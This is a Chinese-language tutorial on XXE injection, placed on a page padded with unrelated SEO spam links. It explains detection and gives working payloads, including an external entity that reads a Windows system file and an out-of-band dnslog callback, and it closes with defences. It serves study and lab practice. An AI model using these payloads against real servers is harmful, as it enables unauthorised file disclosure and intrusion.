当前位置: 首页 > news >正文

专门做优惠券的网站百度搜索关键词排名

专门做优惠券的网站,百度搜索关键词排名,可以仿做网站吗,成都美食网站设计论文一、概述 1、XXE:XML外部实体注入攻击 2、XML:可扩展标记语言。 (1)没有固定标签,所有标签都可以自定义,但有限制规则。 (2)用于数据对的传输与存储,常被用于充当配置文件 推荐教程:XML 教程 (3)后缀…

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.ds6.com.cn/news/113565.html

相关文章:

  • 合肥市城乡建设网站百度关键词优化是什么意思
  • 烟台汽车租赁网站建设定制营销型网站建设
  • 用阿里云做网站seo招聘要求
  • 四川省平昌城乡建设厅网站app制作公司
  • 专门做土特产的网站店铺如何运营和推广
  • 内蒙古住房和城乡建设网站近期舆情热点事件
  • 青岛seo做的好的网站百度关键词在线优化
  • 网站该怎么找到人力资源培训机构
  • 郑州app开发公司哪家比较好郑州外语网站建站优化
  • 做网站平台需要什么条件专业做网站公司
  • wordpress手机认证登录高手优化网站
  • 网站上关键词的推广怎么做口碑营销策略有哪些
  • 2网站建设公司江苏网站建设制作
  • 毕节做网站网络营销软文范例500字
  • 网站上的信息可以做证据吗免费网站大全下载
  • 北京房价长沙企业关键词优化哪家好
  • 上海企业网站建设报域名历史查询工具
  • 区域城市分站网站怎么做湖南中高风险地区
  • 机械加工种类关键词优化包年推广
  • 永川区做网站哪个平台可以接推广任务
  • 重庆卓光网站建设网络营销渠道建设方案
  • 网站备案核验点 上海站优云seo优化
  • 成都网站编辑百青藤广告联盟
  • 网站建设文档sem竞价托管
  • 优秀网站建设空间免费的舆情网站app
  • 十大黄冈网站排行榜seo项目优化案例分析文档
  • 购物网站建设北京seo公司网站
  • 城市联盟网站怎么做咸宁网站seo
  • 做网站 想做成宽屏的交换友情链接的平台有哪些
  • 上海做网站开发的公司最近的新闻摘抄